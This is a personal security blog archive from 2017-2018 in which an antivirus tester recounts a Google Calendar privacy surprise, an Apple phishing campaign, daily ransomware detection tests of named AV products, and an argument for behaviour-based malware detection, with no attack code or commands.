Thursday, March 15, 2018

That was a bit creepy...

So, anyway, for a variety of reasons which are not terribly important now, I decided to start using google calendar today.

First thing it did was ask if it could access my contacts. I generally say no to that sort of request, but, on this occasion, I thought, "What harm could it do?", so I clicked the OK button.

A couple of seconds later, I was shocked to find that it had populated my calendar with a couple of hundred birthdays.

Now I'm not opposed to wishing my friends a happy birthday on their special day, but some of the people in my contacts list are just business acquaintances, rather than "friends", and I would not think it appropriate to know things like that, let alone to wish them a happy birthday.

I thought, "How the heck did google know that just from a phone number or an email address? And what else do they know???"

I mean, I like google, and I consider them Good Guys, but I am concerned about the Privacy Revolution (more about that later), so with a rising sense of anxiety, I figured I'd better look at my contacts, to see if anything obvious was being leaked incorrectly.

Imagine my surprise when the first guy I looked at was not in my address book. Nor the second. Nor the third. None were in my address book. Wait ... what...???

Then I thought, "If it didn't get them from my address book, where did they come from?", and I thought... "FaceBook!!!", but then I poked around a bit, and realized that lots of them weren't friends on FaceBook either... and then, it dawned on me...

Ages ago, I'd joined google plus, but hadn't used it much, and had forgotten about it.

Yup. That's where they came from.

I was a dummy. I don't often admit it, but I was wrong.

Google calendar seems very nice.

As long as it doesn't start laughing at me...

Tuesday, February 27, 2018

Pretty good Apple phish

So, anyway, I've noticed a lot of Apple phishes coming into my email honeypots, and they're convincing enough to catch the unwary, so I thought I'd document it here a little bit. The initial email looks something like this ...
If you click the link, it takes you to this screen ...
which looks pretty convincing, unless you actually parse out the URL in the address bar, at which time you realize it ain't If, however, you are unwise enough to put your AppleID and password in,(or, as I did, just a bogus pair), you are taken to this screen ...
Followed by this one, which is really the point of the whole thing .... they want your credit card.
The screens, unfortunately, are convincing enough that they'll probably catch a few folk. Be cautious out there. Www stands for World War Web.

Thursday, December 21, 2017

AV products do work, folks.

I see a lot of criticism of anti virus products... they can't keep up... they miss nation-state malware... people need magical new solutions... etc. Yesterday, I tested the day's ransomware against ten products that I had readily to hand, namely, Webroot, Sophos, Avast, Symantec, Windows Defender, Panda, Avira, MalwareBytes, FProt, and Eset.

I try to do what I call Real World testing. I install products with their default options, just like an average user might. I don't specifically update the signature databases. If they update, fine. If they don't, oh well. I only use the malware of the day, rather than stuff that is a few days old (and probably extinct). I execute the malware, just as the attackers would like their victim to do, and see who detects it.

Simple, really.

Yesterday's ransomware was spread via an email, with a vbs attached. The pitch in the email is to get you to open the attachment, which executes the vbs, which then goes out to a website, and downloads and executes the ransomware.

In my testing, I simulated that by executing the vbs, and ... wait for it... nine out of the ten products nailed it, either with a generic sig, or by blocking access to the website!

This is a Good Thing (tm), and well done guys and gals.

Of course, this still doesn't answer the vexatious question of what happens when they don't have a sig, but, in the fullness of time, we will find out. I can't do this every day, but I will try to add more products to the mix, and see what happens.

Stay tuned, and keep safe.

Wednesday, October 25, 2017

BadRabbit, etc, yawn

So, anyway, the world has seen another ransomeware worm, and it has been effective, and it has hurt some folks.

Guess what? It is a given that there will be more.
Here's why.
When I started in antivirus, waaaaaaay back in 1987, there were only three ways to tell if something was malicious.
(1) You saw it do something malicious
(2) You reverse engineered it, and saw it contained code that _could_ do something malicious if it wanted to, or,
(3) Someone's signature scanner _told_ you it was malicious.

The problem with the first one is that it could cause a support call. "I think this program is doing something bad. Please come and sort it out." This causes a support call, and this is anathema in a corporate environment.
The problem with the second one is that it's really hard, and takes a _lot_ of effort. Humans are essentially and inherently lazy, so no one wants to do this much.
Option three, a scanner, either blocks something, or says nuffink. The upside is that if it blocks it, all is well, and this does _not_ cause a support call, but if it's a ransomware worm, or nation-state stuff, like Duqu 2.0, it gets away, and really, really, really hurts.

Regrettably, nothing has changed, and there are still only three ways.

Waaaay back in the early 90s, corporations chose scanners, and voted with their pocketbooks.

This made a certain amount of sense, when there were only a few thousand pieces of malware, but the problem with signature scanners is that they have great difficulty seeing new things. The Bad Guys understood this, and started finding ways to make new variations of their code as frequently as possible. This is automatable, by, for example, changing a few chunks of unimportant code, or changing the packing, or the encryption algorithm, or both.
Today, we see a million new, and unique pieces of malware every day.
This is a natural consequence of choosing signature scanners, back in the early 90s.
We can not keep going like this, or one day, there will be ten million new samples every day, or a hundred million.
There is a simple-ish solution.
Detect that it's doing something malicious.
No, it's not easy, but it's smarter, and the right thing to do.
And, we testers need to stop testing scanners, once a month, against old malware that probably doesn't exist any more, and start testing how everyone detects the day's new stuff.
It's the only way forward.
Stay tuned here, folks.

Tuesday, October 10, 2017

Less than 50% detections

Today's ransomeware score... six missed (one detected stuff, but the malware encrypted the drive anyway, so that's a miss), five blocked, but with sigs... none with behavior detections.

Today's md5 is c50b81f99269bd05299df41dee8844da.

F-Secure is added to the test.

Missed were Webroot, Windows Defender, Panda, Avira, Trend.

Eset detected stuff, and removed what it saw, but the malware got away, so it's a miss.

Kaspersky, Sophos, Symantec and F-Secure blocked it with a sig.

Avast blocked it, but also blocked my software, so that's a false positive. False positives are anathema in a corporate environment, otherwise we could all use Solly's Perfect.bat, which never misses anything...

(Perfect.bat is "Echo %1 is malware"... never misses anything bad, but has a few false positives. This can be fixed, as well, which we can talk about later)

Guys... the malicious behavior with ransomware is obvious. We shouldn't be missing any of these. Please step up. I know we can do it.

Stay tuned.

Monday, October 9, 2017

Who caught today's ransomware?

So, as readers of my blog will know, I am trying to find out who can trap malware, without having a signature for it, and without false positives. In other words, as it executes.

For today's test, I had a piece of ransomware, that had arrived in a buddies inbox yesterday. A quick check of its md5 on VirusTotal showed just a few sig detections.

I currently have ten products under test. They are the end-point versions of WebRoot, Kaspersky, Sophos, ESet, Avast, Symantec, Windows Defender, Panda, Avira, and Trend. I would have installed McAfee, except that it keeps barfing on one of the files it installs. It says mcmscins.dll, in the McTemp directory, is either not designed to run on Windows, or it contains an error. I tried calling their tech support about it, but the guy said he could find no record of that error. I expect this will sort itself out sometime soon, and I'll be able to add it to the test set, but that's a story for another day.

Five products missed it completely. One found a sig in memory, but it still got away, so that's really a miss. Two blocked it with a sig. Two found it with heuristics. I'll get to the names in a bit, but here's how the test works.

(1) I first run the malware on an unprotected Win7-32bit vm, and see what it does.
(2) All products are installed with default features. It is important to note that some products have extra features that can be turned on specifically to block ransomware by protecting some folders, but I am running with defaults.
(3) I don't update the signatures. The vms are only up for a minute or two, so most of the products don't have time to update, and I do that deliberately.
(4) Windows Defender is switched off in all vms, except, obviously, it's own test vm.
(5) To be fair, products could also have blocked the initial downloader, or even the website that it tried to reach for the ransomware. I did not test that, as it was outside the scope of this test.

Please remember that I am not knocking signature scanners, as they are an absolutely vital layer of defense, but with greater than a million new and unique samples every day, it's not possible to add sigs for them all. Remember also that, although within a few days most scanners will have had sigs added, some malware is changing every day, and only exists for one day. The real threat is not what was around a week ago. It's what's around today.

The MD5 of the malware under test is BE499852672E9A1E5D222427978EA421.

Please also remember that just because a product misses something today, it doesn't mean it's weak. Now, if it consistently misses, day after day, that might be a different story, but the world is a safer place if everyone gets stronger. The five that missed were Webroot, Windows Defender, Avira, Panda and Trend. The one that found a sig in memory (it named it Kryptic, iirc), but it still got away, was ESet. Two two that blocked it with a sig were Sophos and Avast. The two that caught it with behavior and/or heuristics, were Kaspersky and Symantec. Well done, lads. And lasses.

Let's see what tomorrow brings.

Cheers all.

Sunday, October 8, 2017

This is probably important

So, last week, I was looking at a bit of malware that was posting to This was obviously a non-existent url, so I was wondering ... why?

In the fulness of time, with a bit of help from some friends, I came to understand that it was only pretending to write to, and it was just trying to cover its tracks. This was a Dimnie variant, with a great write-up here. (Thanks Kevin. You know who you are.)

There was this write-up, and another by Symantec at about the same time, and the nub of the matter are these points:

(1) Dimnie had been around for a few years by the time it was finally noticed in March of 2017. This means it is subtle.
(2) Dimnie achieves persistence by injecting itself into running processes. It would probably go away if the computer was rebooted, but that doesn't happen often.
(3) The versions that Paloalto and Symantec saw seemed to surveil the target. They looked for what processes were running, possibly for extra vulnerabilities, that might be used later. This means nothing, right?
(4) Initial versions installed a keylogger, but the framework was sufficiently flexible that anything could be installed. The bottom line here is that if ever you let malware loose on your computer, it is no longer yours. It belongs to someone else.
Think about this...
In my initial tests, only one product blocked it by behavior.
It took three years to be noticed the first time, in March 2017. It doesn't seem to have been seen much since then, and I stumbled on it by accident.
This either means that there have been no new versions since March, or ... given that we know they are subtle, could it be that they are simply changing it every day, as with the other bit of malware that I blogged about earlier? We could well have been missing them since March.

In my opinion, given also that its primary objective sure _feels_ like surveillance, this proves that we must start focussing on non-signature malware detection. Again, I'm not knocking signature scanners... they are vital.... we simply have to do more, and it's up to us testers to focus on testing that, rather than just sigs.

Stayed tuned, folks.